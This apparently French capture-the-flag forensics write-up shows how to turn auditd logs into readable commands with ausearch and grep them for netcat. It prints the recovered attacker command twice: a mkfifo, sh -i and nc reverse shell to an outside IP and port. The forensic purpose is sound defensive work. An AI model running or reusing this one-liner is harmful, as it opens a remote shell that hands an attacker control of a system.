Table des matières
Nettoyage et fusion des logs
Avec un premier traitement il sera plus simple de visualiser les commandes. Nous allons donc utiliser l’outil d’auditD ausearch afin de rendre lisible le champ proctitle et pour simplifier les recherches nous concatenerons l’enssemble dans un unique fichier.
for logfile in *.log; do
echo "Processing $logfile..."
sudo ausearch -sc execve -i -if "$logfile"
echo "--------------------"
done > full.txt
Recherche de commandes suspectes
Afin de trouver un reverse shell, netcat et sh -i sont de bons candidats. Avec vi/nano ou n’importe quel bloc-notes, il est relativement rapide de trouver des chaînes contenant les deux à proximité.
Il peut y avoir un autre indice, mais le mentionner divulgâcherait une partie de l’épreuve suivante. ;-)
grep "|nc " full.txt
node=webserver type=PROCTITLE msg=audit(13/06/2023 10:38:55.854:2903) : proctitle=/bin/bash -c rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 80.125.9.58 50012 >/tmp/f
On a la commande :
/bin/bash -c rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 80.125.9.58 50012 >/tmp/f